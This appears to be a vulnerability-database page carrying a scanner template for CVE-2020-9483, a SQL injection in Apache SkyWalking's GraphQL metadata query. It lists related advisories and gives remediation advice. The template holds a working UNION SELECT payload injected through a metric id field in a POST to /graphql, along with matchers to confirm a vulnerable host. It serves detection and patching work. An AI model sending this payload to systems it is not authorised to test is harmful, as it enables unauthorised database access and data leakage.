| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2020-9483 | 22 Mar 202113:37 | – | circl | |
| Apache SkyWalking SQL Injection Vulnerability | 24 Jun 202000:00 | – | cnvd | |
| Apache SkyWalking Storage SQL Injection (CVE-2020-9483) | 28 Dec 202000:00 | – | checkpoint_advisories | |
| CVE-2020-9483 | 30 Jun 202014:28 | – | cve | |
| CVE-2020-9483 | 30 Jun 202014:28 | – | cvelist | |
| Exploit for SQL Injection in Apache Skywalking | 19 Jul 202106:50 | – | githubexploit | |
| CVE-2020-9483 | 30 Jun 202015:15 | – | nvd | |
| Sql injection | 30 Jun 202015:15 | – | prion | |
| CVE-2020-9483 | 22 May 202516:54 | – | redhatcve | |
| SQL Injection | 1 Jul 202003:09 | – | veracode |
id: CVE-2020-9483
info:
name: SkyWalking SQLI
author: pikpikcu
severity: high
description: |
When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability.
reference:
- https://github.com/apache/skywalking/pull/4639
- https://nvd.nist.gov/vuln/detail/CVE-2020-9483
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/developer3000S/PoC-in-GitHub
- https://github.com/pen4uin/awesome-vulnerability-research
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9483
cwe-id: CWE-89
epss-score: 0.34613
epss-percentile: 0.98221
cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: skywalking
tags: cve,cve2020,sqli,skywalking,apache,vuln
http:
- method: POST
path:
- "{{BaseURL}}/graphql"
body: |
{"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}}
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/json"
- type: word
part: body
words:
- "UNION SELECT 1,CONCAT('~','9999999999','~')--"
- 'Exception while fetching data'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201b8d23c59c89373e3d6c12f5082dc903b4d6bd4b097769539ea2f22959be3a63022100f7680d566dc955682a1439c62784b6d394bc8385a7e5876bbcc110c0c8095f8e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation